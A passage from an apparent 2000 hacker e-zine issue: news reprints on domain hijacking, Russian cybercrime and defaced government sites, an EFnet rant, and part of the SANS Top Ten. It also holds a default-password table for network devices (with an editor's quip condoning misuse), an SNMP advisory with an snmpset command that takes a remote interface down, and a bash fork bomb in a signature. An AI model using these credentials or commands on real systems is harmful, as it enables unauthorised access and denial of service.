``This looks like international domain name laundering. I think we're going to start seeing more of this,'' said Ken Campbell, president of K.K. Campbell Internet Consulting in Toronto, and the first to discover Web.net's predicament.

Earlier this week, hijackers forged, or in Web language ''spoofed,'' Web.net's e-mail account, explained Campbell. The hijackers also made crucial changes to the database of Network Solutions, where Internet addresses are registered, and changed the official owner of Web.net to Billy Tandoko of Jakarta, Indonesia.

The hijackers then moved Web.net's registry to a micro-registrar in Toronto and changed the legal owner to Paul Vernon, allegedly of Hong Kong, and rerouted all traffic to reserveme.com.

Web.net is still not in control of its Web site, although as of Wednesday reserveme.com began redirecting mail and Web site inquiries back to Web.net's servers, said Tonya Hancherow of Web Networks, the legal owner of Web.net.

The same hijackers made similar changes to the ownership of Bali.com, and Campbell has since uncovered one more case of Web site hijacking, but does not think the third case is linked.

Hancherow said she can't believe such a breach of security is as easy as spoofing an e-mail account. ``No password was provided and Network Solutions processed the change without consent,'' said Hancherow.
The hijackers' motives are still a mystery. ``I think I'm witnessing an Internet version of international money laundering, whereby someone is scooping up domain names worth $100,000 each, moves them around so the paper trail is lost, and ends up with substantial assets,'' said Campbell.

Hancherow first thought the hijacker was going to try to extort money from Web Networks, but their non-profit status could complicate such a demand. ``The other two options: Is he trying to steal it so he can resell it, or is he just trying to play games to make our lives a bit more difficult?'' said Hancherow.

Brian O'Shaughnessy, a spokesman for Network Solutions, told Reuters this type of hijacking has happened at least a dozen times in the past year and Web Networks is a victim of the excessive volume his company is experiencing from people registering domain names.

``A new dot-com is added every 5 seconds. Domain names are a valuable piece of property and that's what people are looking for: a valuable identity on the Internet,'' said O'Shaughnessy. ``The rightful owner still has the domain. An unlawful act has been committed using a hole in the system,'' he added.

With the introduction of competition to the domain name registry field in June 1999, a complex layer has been added to the system, making hijacking easier, said O'Shaughnessy. Nevertheless, Campbell believes those businesses that have suffered substantial losses due to hijacking may want to take Network Solutions to court.

Campbell warned that there was no longer a central administrator guarding the Internet's security, as there was before 1993, when the Clinton administration transformed the Internet from academic tool to commercial medium.

``They took away those kind of feudal lords and brought in the naked system that is not very secure,'' said Campbell. ``The Internet was based on a co-operative environment, not a fiercely competitive capitalistic environment, and that's why these problems perennially show up.''

@HWA 251.0 [IND] High-Tech Crooks Thrive in Russia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 2 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060100c_j.shtml

6/02/00
High-Tech Crooks Thrive in Russia
By David McHugh, Special for USA TODAY
06/01/00

MOSCOW - The open-air Gorbushka market is the Alice's Restaurant of software. You can get anything you want.

Laid out on tables under the trees of a Moscow park - as if at a huge yard sale - are row upon row of compact discs. The discs are crammed with pirated versions of expensive programs worth hundreds or thousands of dollars. Vendors offer everything from Microsoft's Windows 98 operating system to computer-assisted-design and voice-recognition software. Here, though, they're on sale for 75 rubles, or about $2.75, a disc.

It's all illegal, but who's noticing?

Russia's anarchic computer culture is fertile ground for hacking, piracy, credit-card fraud and other digital crime. Gorbushka, with its vendors hustling at makeshift tables, is just one of the more obvious examples.

Russia has only about 1.5 million Internet users, a small number when compared with the estimated 110 million in the USA. But among them are some of the world's busiest digital vandals, pirates, thieves and spies. Their victims include the wealthy and powerful: Microsoft, whose software is widely pirated here, America Online, the Pentagon, Citibank.

Police say the number of computer-related crimes continues to rise in Russia. More than 200 cases were reported in the first three months of this year - more than in all of 1999. Typical computer crimes include stealing credit card numbers sent to online businesses, software piracy, stealing passwords to get free time online and theft of business information.
Some examples:

- Police arrested five suspected hackers accused of stealing credit-card numbers from Internet retailers and pocketing more than $630,000, the ITAR-Tass news agency reported last month. The group, which operated from December to April, stole numbers from more than 5,400 cards belonging mostly to foreigners, police said.

- Working with an insider, hackers bypassed the security system of the huge natural gas monopoly Gazprom last year and temporarily seized control of the system that regulates gas flows in pipelines, according to the Interior Ministry. Officials did not say whether the break-in caused any damage.

- A Russian hacker going by the name Maxus distributed more than 25,000 credit-card numbers stolen from an online store, CDUniverse.com. Most of the records were from accounts in the USA, where 65% of the company's customers live. Maxus tried to extort money from the company in January; he sent an e-mail in which he said he had breached the security of a popular credit-card processing program and stole 300,000 customer records. As far as the company knows, he was never caught.

- Hundreds of PIN codes giving access to credit- and debit-card accounts apparently were stolen in mid-1999 after a security breach at a Moscow card-processing center. Cardholders often had their checking accounts cleaned out in an unusual example of bulk PIN theft.

- America Online and Compuserve shut down local Internet access numbers in Moscow in 1997 because of what the company called "intolerable levels of fraud."

- In one of the world's first online theft cases to be prosecuted, Vladimir Levin of St. Petersburg was sentenced to three years in a U.S. prison for stealing $3.7 million from Citibank accounts in 1995 using a personal computer. He was arrested in Britain and extradited to the USA.

- Hackers apparently working from Russia rummaged in Department of Defense computers for more than a year and stole reams of information. No top-secret material was stolen, the Pentagon says. Computers at NASA and Energy Department nuclear weapons labs also were raided. Investigators don't know who was behind the attack, but some say they suspect Russian intelligence services.

Russia's Foreign Intelligence Service has denied it. The agency says it would be too obvious to hack from inside Russia.

Why does so much mischief emanate from Russia?

The hacker problem begins in school, where hacking habits are rife, Russian computer professionals say. During Soviet times, the government and universities actually encouraged people to copy Western software. Sometimes lacking the printed data that come with store-bought software, people began taking programs apart to see how they worked.

"People had to hack programs to learn them and adapt them to Soviet technical conditions," says Mikhail Salnikov, head of Compulog computer consultants and a veteran of the early days of personal computers in Russia.

The Soviet government, by copying Western computer technology rather than developing its own versions, was the first hacker, Salnikov says.

Combine that with Russia's high level of technical education and the result is a culture in which many people think copying software is no big deal. Those people also have the skills to steal passwords or defeat software security features designed to thwart copying.

Maj. Dmitry Chepchugov, head of the Interior Ministry's elite anti-computer crime unit, says poverty plays a role, especially in password theft. "We have many people who need the Internet but don't have the money," he says. So they piggyback on someone else's access.

Otherwise honest people, he says, see nothing wrong in illegal copies, especially when a legal copy can cost a month's wages. "It's only in the past four years that people have begun to see the theft of intellectual property as the same as the theft of real property," he says. "It's an intellectual - and a generational - problem."
In hopes of wresting some of the bigger customers away from the Gorbushka, manufacturers conduct aggressive education campaigns about software compliance in Russia's corporate sector. However, education among Russian software users might not be enough to stop the threat Russian software thieves present.

Macromedia, a San Francisco-based company that produces Web-design software, is not a major player in the Russian market. Still, it can't afford to ignore piracy here. Steve Wozniak, director of the company's anti-piracy programs, says Macromedia software has been sold over the Internet from Russia to customers in the West. Russians also have set up Web sites that give away "cracks" for Macromedia software - essentially providing the intellectual tools for would-be pirates.

Russia rivals China for world leadership in software piracy; about 92% of business software running on Russian machines is estimated to be bootleg, according to the Business Software Alliance, a U.S.-based industry group. Recent estimates put the value of the stolen software at $273 million.

That's not to say corporations aren't making any money in Russia. "By selling only to 8% of potential customers, Microsoft-Russia sales are about $25 million," says Eugene Danilov, Microsoft-Russia's marketing manager. "Imagine what additional revenue could be generated if piracy was reduced to 80%, 70%."

Contributing: Sarah Karush

Original at: http://www.usatoday.com/life/cyber/tech/cti004.htm (06/01/00 - Updated 11:15 AM ET)

@HWA 252.0 [TXT] Treatise: "Why EFnet Sucks." by: Anonymous Whiner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date unknown: sourced from Mixter's archives http://mixter.warrior2k.com.

Brief history, prologue:

EFnet is "Eris Free" net. In a nutshell, a rogue system on a young IRC (Internet Relay Chat) network constantly caused problems for the other systems and anarchy in their midst; consequently it was de-linked (removed from network access) and banished to go form its own network. The offending system named "Eris" was now absent and it was agreed to call the new net "Eris Free" as they were now rid of the offending machine.

Brief rant by the Editor follows:

IRC basically came to life in 1989 with the coding of ircd, so no more talkd hacks were needed for meetings. Personally I believe EFnet is the place to be, but then I grew up here. It was the new frontier: you posted your claim stakes then fought to keep your territories. It's a little different in the methodology today but the psychology and dynamics are essentially the same.
I refuse to give up on a good system simply because some strong-willed, opinionated individuals want to throw their inflated, power-fed egos around causing chaos in our midst. Deal with the issues, correct the wrongs and continue on. Don't just abandon ship and move on hoping the next one doesn't develop some of the SAME holes.... - my 2c (See article on EFnet owning later in this issue) :- Cruciphux

Date: Unknown. I'd say 1995-8 but could be wrong.

And now, the file:

*****************************************************************

Why EFnet sucks
===============

* The four main reasons
* The summary
* The conclusion

1. Rules

The policies of efnet are certainly hypocritical. The main goal of efnet was to provide a free network with a minimum of "laws" that ensure its stability. The main idea was to create a network where no channels, nicknames, or other virtual resources within irc are "owned" by anyone. One main statute was also that irc operators don't get involved in channel and user matters, as long as it is not relevant to an actual problem with an irc server. Look at efnet today: many opers abuse their powers, get involved in senseless conflicts, take over channels and certain nicknames, sometimes in co-operation with takeover groups, and hire untalented accomplices to find bots, spammers or "deal" with "abusers".

2. Routing and Administration

The efnet team is incapable of agreeing on many, many things. They don't manage to use a uniform version of the ircd code; some servers never upgrade, others always upgrade without asking others, etc. This results in a chaotic ircd infrastructure, with some servers vulnerable to certain channel security problems while others are not, or are vulnerable to other problems. The efnet guidelines to get a link to the efnet backbone are also very inefficient. While some powerful servers with high bandwidth are denied links because their link is declined in the act of voting, instead of following objective guidelines, other people's servers, who are already known to the efnet team because they're opers or anything, are accepted even if they do not provide appropriate resources. IRC operators tend toward non-tolerated behavior (abuse, random k-lines) and many have lost their o-lines, while others, who have more "authority", can get away with almost everything.

3. Ircd development

Both ircd servers, the version developed by the hybrid team and the version developed by Chris Behrens, are not coded with optimization and an increase of user functionality in mind; instead more and more paranoid fixes and flood detection are applied to them, with the goal of giving the opers more "power" over their network, and of automatically detecting abuse without doing much. As mentioned before, the actual guidelines of efnet do originally permit many of the kinds of "abuse", like channel takeovers, running bots, etc. Nevertheless, the recent security features do actually cripple the functionality of the efnet network.

Examples for hybrid5 / CS irc daemons:

- opers can cycle channels without delay, and they can set channel modes without delay, while normal users' requests are delayed intentionally
- opers can gain channel ops on netsplits, while it is almost impossible for users, resulting in increased attacking of the servers by takeover groups to cause them to split more frequently
- users who do not send messages for a certain time are disconnected, forcing all efnet servers to have a policy against idling
- joining a channel and parting it immediately, as well as channel CTCP requests, will alert every oper on the server, telling them your private channel name and your nickname, and if a tcm (monitoring bot) is running, it will automatically suggest to the server operators to k-line the user because of cycling or ctcp'ing a channel.

Examples for hybrid6 (will be the new standard):

- The normal user can no longer request STATS information, and other such things like versions, from a remote irc server, preventing a user with a problem from getting administrative info or a list of active operators from that server he could request help from.
- Multiple targets for messaging and noticing are no longer supported. This breaks the RFC for IRC again, and it will force many users to re-write their scripts or even clients.
- Ban exemption like on ircd 2.10 is now supported, with all its vulnerability. Many clients cannot recognize +e modes, and it can be used in channel takeovers, to make flooders/takers unable to be banned out of a channel until the mode is removed.

If all this is not enough, there is confirmed insider information that four major efnet servers are currently running in debug mode, which enables them to see ALL private traffic, like private chat, passwords sent to channel protection bots, messages, etc., and the information is being filtered and sent to the FBI, which requested this. Currently, a big EDU server, an .ORG server, a European server, and a server of a major ISP, which are all linked to efnet, are monitoring traffic via DEBUG MODE.

4. Channel takeover groups

Takeover has always been present on efnet, and in the past it has not been a big threat to servers or users. However, the new wave of takeover people is using high-bandwidth attacks against servers and users, causing severe damage to everyone, and threatening the major channels of efnet which are their primary target. One problem is that "new school" takeover people actively compromise hundreds of random servers over the internet, with the single purpose of using the boxes with high-bandwidth connectivity to attack irc servers and irc clients. Group members co-operate to gather their power against anyone, being a serious threat to anyone they decide to attack for whatever reason.

Also, there has been a big recent increase of shell services on the internet, who offer high-bandwidth access, like it had only been available to educational institutions and enterprises before, to everyone for prices as low as $5 per month. Today, everyone can afford this technology along with fancy long hostnames that look like the hostnames used in spoofing attacks some years ago. But note that these people are anything but hackers. They have merely the knowledge of how to configure a bot or irc client and know 3-5 shell commands, which they also use to attack from their compromised hosts, and that's all. The problem is that almost every teenager without a clue can nowadays get a shell and a fancy hostname, which will eventually get him into a group with other people like him, who teach him the basic skills of compromising a server and running denial-of-service off it.

Summary:

As a normal user not willing to break into hosts or join an online rioting gang, you are helpless against takeovers, and the irc ops won't help you either.

As an experienced user or hacker you are attacked by ircops because you are "abusive". You can join a 1337 takeover group if you can bear to deal with their lameness or stupidity...

As a takeover kiddy you are in the gang of elite vhost ownerz and do pretty much what you want, while you attack servers with kinds of attack whose damage you probably cannot even evaluate. The size of your ego exceeds the size of your intellect and you have to play avoid-the-k-line every day by carding new leet vhosts. If you are one of the dumbest sort of takeover kiddies you waste your additional free time with warez. You get what you want for the price of having neither a life nor half a mind...

As an irc operator or admin you are always involved in the hassle with other opers, who tell you what to do or what not, and if you get unpopular, your server will become a target for takeover d00ds. You can start becoming mr. evil mass k-liner, which will undoubtedly escalate the "war", and you might succeed in banning the takers and "abuse", with extreme aggression against takers and probably innocent people as well, from your server to another one, and/or worse, get into more dumb hassle with the ircop "community", maybe get your o-line removed or your server delinked.

Conclusion:

Leave EFnet.

Greets to Monk aka Monkster aka Monkiespankr how do you like this one.

@HWA 253.0 [HWA] Honeypots: who's fooling who?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

July 2000
By Cruciphux

First of all, what is a honeypot? A honeypot is a term coined to describe a system that is either intentionally weak in security or is placed outside a company's firewall, to distract would-be crackers or attackers from the real valuable content 'protected' and concealed within. This practice has been the source of much debate since its inception and use by several companies and security outfits on the net. It should be noted that honeypots are not the exclusive domain of the good guys ('white hats') currently employing this tactic.

@HWA 254.0 [IND] Hacking Away At Government
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 2 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060200a_j.shtml

6/2/00
Hacking Away At Government
By Christopher Swope, Governing Magazine, June 2000

HIGHLIGHT: In the race to get online, network security has been something of an afterthought. But even the most obscure agency can be a target for Internet intruders.

BODY:

"Fresno Means Business" is the first thing you see when you visit the California city's Web page, and to emphasize the point, there is a collage of pictures showing the downtown skyline and business people working. The message, the collage says in so many words, is "Development and Economic Vitality." So you can imagine city officials' displeasure one day last November when the skyline and business people were suddenly gone, replaced with a different message: "Hacked by globher."
It wasn't the first time Fresno's site had been hacked. Three weeks earlier, another intruder had taken down the site and replaced it with boastful gibberish and profanity. Fortunately, during both incidents, no major damage was done, and each time the city's Web team had the site cleaned up in less than an hour. "We thought we were covered, but they knew the tricks to get into the server," says Allen Smith, Fresno's webmaster. "If we had kept up with Microsoft's security alerts, we would have been OK."

If officials in Fresno are a bit embarrassed by these incidents, they have plenty of company. According to records on Web site defacements kept by attrition.org, a hacking watchdog, more than five dozen state and local governments or agencies were attacked in the six months between November and April. The day after the second hit on Fresno, for example, a hacker who goes by the name "YTCracker" attacked one of the less likely targets in the state of New York: the Department of Agriculture and Markets. Again, no serious harm was done, although it also must have left some in the department blushing. Among other things, the hacker scrawled the quote "YTCracker is cool" under a picture of Governor George Pataki. "The whole episode really woke us up to the possibility that even we can get hacked," says Peter Gregg, a department spokesman. "We figured, who'd want to hack us?"

By now, most state and local governments have staked out a presence on the Internet, but in the race to get online, network security has been something of an afterthought. What they're starting to find--some of them the hard way--is that anyone on the Internet, even the most obscure government agency, is a target for computer hackers. "It's really a matter of when, not if, you'll be attacked," says Mark Zajicek, a computer security expert with the CERT Coordination Center at Carnegie Mellon University. "Once you connect to the Internet, the rest of the Internet is connected to you."
Fresno, like most places that have been hit by hackers so far, was lucky: The site contained only such static information as press releases, job listings and city phone numbers. This time around, the hacker attacks amounted to little more than digital graffiti. The damage, in fact, was probably easier to remove than spray paint from a wall.

In the era of digital government, however, network security will only increase in importance and complexity. Fresno, like nearly every state, city and county, is looking into delivering services online, from tax collection to issuing permits. It is an exciting development, but the flip side is that each new service opens a channel into government computer networks for hackers to exploit.

Web-enabled government not only exposes a new Achilles heel to malicious hackers but also elevates the battle against them to a new level. To hackers, a digital government is simply a juicier target. There is more havoc to wreak by breaking in, and more notoriety to be gained. To state and local governments, credibility is on the line: The success or failure of their Web ventures will hinge on citizens' faith in their security to use them. "Every time a state or local government moves a new process into the cyber-domain, it raises vulnerability," says Steven Trevino, an executive with Infrastructure Defense Inc., a network security firm that is working with Public Technology Inc. to assess the security needs of local governments. "It's a risk-management proposition they've never had to deal with."

SNIFFING OUT HACKERS

The war on hackers, quite expectedly, has spawned a booming market for security software and hardware. State and local governments are installing firewalls to separate data on internal systems from what goes up on the Web. Soon after being hacked, the New York agriculture department stocked up on intrusion-detection software that can sniff out a hacker's moves before any damage is done.
The scary thing, however, is that even vendors who sell the stuff admit that no amount of network protection could keep out the smartest, most dedicated hackers. Of course, one doesn't even need to be a computer geek to be a hacker these days. Anyone can learn the basics by visiting a number of Web sites that essentially teach "hacking for dummies" lessons. Even a lot of the technical work of hacking has been automated, in programs that can be downloaded off the Internet for free.

In many ways, network security is a cat-and-mouse game. Nearly every piece of technology running the Internet today has a bug in it somewhere for hackers to exploit. Companies such as Microsoft are continually issuing security warnings about holes in their software, and offering "patches" that fix the problem. Of course, the bad guys pay attention to these warnings too, and use them as a road map for breaking into systems that haven't been updated. "Just buying the latest commercial products may give you a false sense of security," says Zajicek. "Unless you're continually upgrading, it's just a race between your product and the latest attack methods."

While spending money on upgrading software and hardware can certainly help, that is the easy part, security experts say. The hard part is cultivating a management culture that recognizes the importance of security and the urgency of addressing security issues quickly. The political need to get more information and new services online as fast as possible often trumps the practical need to have a well-fortified site. Moreover, many state and local IT departments are chronically understaffed, already tugged in a hundred different directions.

The lesson, management-wise, from a recent security incident in the city of Sunnyvale, California, is that it pays to be proactive.
Back in February, at the same time that popular Web sites such as Yahoo!, eBay and CNN.com were being shut down by so-called "distributed denial of service" attacks, Sunnyvale's IT managers noticed that something funny was happening to their site, too. Traffic suddenly shot up six-fold, and engineers determined that much of the increased traffic was coming from one particular address in Virginia. They immediately took measures to block hits from that address, and the problem went away.

Sunnyvale Chief Information Officer Shawn Hernandez says he's still not sure whether the incident was related to the attacks on Yahoo! and the others. And unlike those attacks, the increased traffic on Sunnyvale's site never peaked high enough to shut it down. That's all the more reason to take a proactive stance. "You have to constantly monitor your network, be familiar with the level of traffic expected, and zero in on that when it fluctuates," Hernandez says. "When you see abnormal situations, you need to investigate and jump on it immediately."

HIRING WHITE HATS

In that vein, security experts say that every government on the Web should be aware of what its security weaknesses are. Some have taken to hiring ethical hackers, or "white hats," who break into their systems in order to assess what holes exist. Ideally, governments should patch those holes up, or at bare minimum, monitor them closely, and should have a plan for dealing with hacker attacks when they do, inevitably, happen.

Unfortunately, it is often not until a security breach occurs that a more comprehensive security plan takes shape. By then, of course, it is too late--although not too late to keep it from happening again. It took just 13 minutes last March for a hacker to break into the Web page of the Oklahoma Department of Libraries. But it took six days for the department to get the site back up.
In the wake of the incident, Web development officer Michael O'Hasson performed an extensive security assessment and shared lessons from the episode at a state Web managers' meeting. The lessons read like a self-help pamphlet for techies. "Do not think that obscurity will save you," says one. "Never assume that prior security patches were done before," reads another. The other points make clear the need to have contingency plans in place, such as having a "summer home" for a Web site, an alternate place to host the site in case of emergency.

In the meantime, the Oklahoma Department of Libraries--like Fresno and a lot of other state and local agencies that thought they were safe--can take comfort in the fact that this round with the hackers has really been something of an exhibition match. It's the next round, with confidential taxpayer data and credit-card numbers at stake, when the score will really count. "The break-in right now is actually good for us," says Allen Smith, the Fresno webmaster. "We don't have that stuff out there now, but we're planning on it. Actually, it's good timing, because it made us more aware of what we need to look at."

@HWA

255.0 [IND] The DEPL and other Default password lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Compiled by Cruci. (May/Updated/Nov 2000)

Scarfed from the VULNDEV full disclosure security mailing list (Security Focus), PacketStorm and other sources.

http://www.phenoelit.de/dpl/dpl.html
http://packetstorm.securify.com/docs/hack/defaultpasswords.txt

Double edged swords.... use in an ethical manner... unless you REALLY must fuck someone over and they like deserve it or some shit. - Ed :-o

$Id: dpl.html,v 1.5 2000/07/13 06:06:39 lists Exp lists $

{ Included in archive. }

If you did not receive the DEPL in your archive, complain to your distributor. Sorry, no refunds, no exchanges.
Supplementary Listing: Default usernames and passwords for Routers/Switches/Hubs and other thingies

Type/vendor/notes/etc                      Username   Password
3Com                                       admin      synnet
3Com                                       read       synnet
3Com                                       write      synnet
3Com                                       monitor    monitor
3Com                                       manager    manager
3Com                                       security   security
3Com_Office_Connect_5x0_ISDN_Routers       n/a        PASSWORD
3comCellPlex7000                           tech       tech
3comCoreBuilder7000/6000/3500/2500         debug      synnet
3comCoreBuilder7000/6000/3500/2500         tech       tech
3comHiPerARCv4.1.x                         adm
3ComLANplex2500                            debug      synnet
3ComLANplex2500                            tech       tech
3comLinkSwitch2000/2700                    tech       tech
3comSuperStackIISwitch 2200                debug
3comSuperStackIISwitch 2700                tech
ACC(Ericsson)                              netman     netman
ADC_Kentrox_Pacesetter_Router              n/a        secret
All_Zyxel_equipment                        n/a        1234
AT&T_3B2_firmware                          n/a        mcp
AXIS200/240[netcam]                        root       pass
Bay_routers                                Manager
Bay_routers                                User
Bay350T_Switch                             n/a        NetICs
BaySuperstackII                            security   security
BRASX/I01_(DataCom)                        n/a        letmein
BreezeCOM_adapters2.x(console_only)        n/a        laflaf
BreezeCOM_adapters3.x(console_only)        n/a        Master
BreezeCOM_adapters4.x(console_only)        n/a        Super
Cayman_DSL                                 n/a
Crystalview_outsideview32                  n/a        crystal
digiCorp_(viper?)                          n/a        BRIDGE
digiCorp_(viper?)                          n/a        password
DLink_hub/switches                         D-Link     D-Link
Flowpoint_DSL_installed_by_Covad           n/a        password
Flowpoint_DSL2000                          admin      admin
Jetform_design                             Jetform    n/a
Lantronics_Terminal_server_port 7000       n/a
Lantronics_Terminal_server_port 7000       n/a
Linksys_DSL                                n/a        admin
Livingston_IRX_router                      !root
Livingston_officerouter                    !root
Livingston_portmaster2/3                   !root
Microplex_print_server                     root       root
Motorola-Cablerouter                       cablecom   router
Netopia_7100
Netopia_9500                               netopia    netopia
Orbitor_console                            n/a        password
Orbitor_console                            n/a        BRIDGE
Osicom(Datacom)                            sysadm     sysadm
Shiva                                      root
Shiva                                      Guest
SpeedstreamDSL(Efficient)                  n/a        admin
UClinux_for_UCsimm                         root       uClinux
Webramp                                    wradmin    trancell
Alteon ACEswitch 180e (web)                admin      admin
Alteon ACEswitch 180e (telnet)             admin
NETPrint (all)                             n/a        sysadm
Xylan Omniswitch                           admin      switch
Xylan Omniswitch                           diag       switch
AcceleratedDSL CPE and DSLAM               sysadm     anicust
Arrowpoint                                 admin      system
Cabletron (routers & switches)

Needed: Packeteer, Cabletron, SMC, Accton

Contributed by:
Stephen Friedl
Sebastian Andersson
Jonathan Leto
mat@ivntech.com
Mike Blomgren
Knud Erik Højgaard
mobileunit@mobileunit.org
Roelof Temmingh
Axel Dunkel
Mathias Bogaert (extracts from "Hacking Exposed")
Jonathan Leto
Chris Owen
Jim Wildman
Santiago Zapata
Brian S. DuRoss
Eric Knight
Max Vision vision@whitehats.com
Lou Albano mistert@dslnet.com

Last Updated on Fri Jul 7 02:14:22 SAST 2000
By Roelof Temmingh
Email: roelof@sensepost.com

World writeable SNMP communities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Days ago, there was a discussion about world-readable snmp communities; some people thought it was bad enough. Amazingly, I've found that a lot of network devices (such as intelligent switches, WAN/LAN routers, ISDN/DSL modems, remote access machines and even some user-end operating systems) are by default configured with snmp enabled and unlimited access with *write* privileges. It allows an attacker to modify routing tables, the status of network interfaces and other vital system data, and seems to be extremely dangerous.
To make things even worse, some devices seem to say that write permission for a given community is disabled, but you can still successfully write to it - and other devices won't let you set up snmp access at all (eg. some modems and switches).

Here's a brief list of devices I've found with world-writable communities - and the names of these communities, respectively:

- 3com Switch 3300 (3Com SuperStack II) - private
- Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
- 3com RAS (HiPer Access Router Card) - public
- Prestige 128 / 128 Plus - public
- COLTSOHO 2.00.21 - private
- PRT BRI ISDN router - public
- CrossCom XL 2 - private
- WaiLAN Agate 700/800 - public
- HPJ3245A HP Switch 800T - public
- ES-2810 FORE ES-2810, Version 2.20 - public
- Windows NT Version 4.0 - public
- Windows 98 (not 95) - public
- Sun/SPARC Ultra 10 (Ultra-5_10) - private

This list is for sure incomplete, and might be inaccurate - it has been created after extensive, but only remote, tests on devices outside my network (usually, these machines are inside ISP networks).

On the following devices, some parameters can be changed, but some can't - so it seems to be less dangerous:

- HP LaserJet (EEPROM G.08.03) - public
- PICO router - public
- Xyplex Router 6.1.1 - private

Best solutions:

- try to disable unlimited snmp access, if possible, then check if it really worked,
- ask vendor for firmware upgrade,
- do not route traffic addressed to snmp-enabled devices from outside.

Other systems: Cisco and Motorola routers, Netware, most Unix boxes are not vulnerable.

Exploit code:

$ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2

...should bring the 1st network interface on the remote machine down...
For more interesting options to be set, execute:

$ snmpwalk hostname {private|public}

_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

@HWA

256.0 [IND] Security Firm To List Additional Hacking Threats
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 2 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060200b_j.shtml

6/2/00
Security Firm To List Additional Hacking Threats
By David McGuire, Newsbytes

WASHINGTON, D.C., U.S.A., 02 Jun 2000, 4:49 PM CST

While Thursday's unveiling of the 10 most dire Internet security threats has already generated widespread discussion in the technology community, one cyber-security firm is warning against taking the list at face value.

Published Thursday by the not-for-profit SANS (System Administration, Networking and Security) Institute, the highly technical "Ten Most Critical Internet Security Threats" list is a valuable document, but should not be seen as the end-all and be-all of security concerns, Network Security Technologies (NETSEC) Vice President Joseph Nowland said today.

The threats listed in the document are just the "tip of the iceberg," Nowland said, warning network administrators not to feel safe simply because they address the 10 concerns outlined by SANS. NETSEC intends next week to release its own supplemented list of Internet security threats identified by its in-house team of hackers, Nowland said.

SANS leaders agree that the list of security threats, which reads like Egyptian hieroglyphs to the technologically uninitiated, is just a stepping-off point for addressing security concerns. "All we've done so far is define the problem," Stephen Northcutt, the director of SANS' Global Incident Analysis Center, told Newsbytes on Thursday.
"The next step is to create a step-by-step repair (protocol) for every single operating system on the face of the planet." Nowland said that NETSEC security experts became concerned when they say news reports that seemed to indicate that the SANS document was somehow a comprehensive list of cyber-threats. Organizations that simply fix those problems and think they are safe would be in for a serious shock, Nowland said. NETSEC's list of additional security threats will include holes not outlined in the SANS list, he added. While the SANS Top 10 list, which is posted on the SANS Web site at http://www.sans.org/topten.htm , contains links to patches for some of the threats it enumerates, Northcutt said Thursday that a broader solution will be much longer in coming. NETSEC's Web site is located at http://www.netsec.net . @HWA 257.0 [IND] SANS: Top 10 hacker targets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Follow-up from previous article July 11 2000 http://www.infowar.com/hacker/00/hack_060200b_j.shtml How To Eliminate The Ten Most Critical Internet Security Threats The Experts’ Consensus Version 1.24 July 11, 2000 Copyright 2000, The SANS Institute Log of updates v. 1.24 - 07/11/00 Section added naming people who have helped improve this document through their contributions v. 1.23 - 07/11/00 Section 2 CVE List revised and updated v. 1.22 - 06/19/00 Signatories updated v. 1.21 - 06/16/00 Signatories corrected v. 1.20 - 06/15/00 # 11 in "Perimeter Protection For An Added Layer of Defense In Depth" section updated v. 1.19 - 06/12/00 Correction - Section 8E moved to 7E. v. 1.18 - 06/08/00 Updated section 8E and F by adding diagnostic and correction utility. v. 1.17 - 06/08/00 Sections 4A and 4B updated v. 1.16 - 06/08/00 # 11 in "Perimeter Protection For An Added Layer of Defense In Depth" section updated v. 1.15 - 06/06/00 Signatories corrected v. 1.14 - 06/04/00 Signatories corrected v. 1.13 - 06/02/00 Section 5A and 5B updated, 5C removed v. 
1.12 - 06/02/00 Section 7E updated v. 1.11 - 06/02/00 Sections 3B & 6B SGI Software Patches updated > Download this document in MS Word format > Download this document in .rtf (Rich Text) format SANS Educational Programs SANS Parliament Hill 2000 August 21-24, 2000 Network Security 2000 October 15-22, 2000 Stop the Break-Ins! The majority of successful attacks on computer systems via the Internet can be traced to exploitation of one of a small number of security flaws. Most of the systems compromised in the Solar Sunrise Pentagon hacking incident were attacked through a single vulnerability. A related flaw was exploited to break into many of the computers later used in massive distributed denial of service attacks. Recent compromises of Windows NT-based web servers are typically traced to entry via a well-known vulnerability. Another vulnerability is widely thought to be the means used to compromise more than 30,000 Linux systems. A few software vulnerabilities account for the majority of successful attacks because attackers are opportunistic – taking the easiest and most convenient route. They exploit the best-known flaws with the most effective and widely available attack tools. They count on organizations not fixing the problems, and they often attack indiscriminately, by scanning the Internet for vulnerable systems. System administrators report that they have not corrected these flaws because they simply do not know which of over 500 potential problems are the ones that are most dangerous, and they are too busy to correct them all. The information security community is meeting this problem head on by identifying the most critical Internet security problem areas – the clusters of vulnerabilities that system administrators need to eliminate immediately. This consensus Top Ten list represents an unprecedented example of active cooperation among industry, government, and academia. 
The participants came together from the most security-conscious federal agencies, from the leading security software vendors and consulting firms, from the top university-based security programs, and from CERT/CC and the SANS Institute. A complete list of participants may be found at the end of this article. Here is the experts' list of the Ten Most Often Exploited Internet Security Flaws along with the actions needed to rid your systems of these vulnerabilities.

Three Notes For Readers:

Note 1. This is a living document. It includes initial, step-by-step instructions and pointers for correcting the flaws. We will update these instructions as more current or convenient methods are identified and we welcome your input. This is a community consensus document - your experience in eliminating the vulnerabilities can help others who come after you. To make suggestions e-mail info@sans.org with the subject Top Ten Comments. To get the latest version of the guidelines, e-mail info@sans.org with the subject Top Ten Fixes.

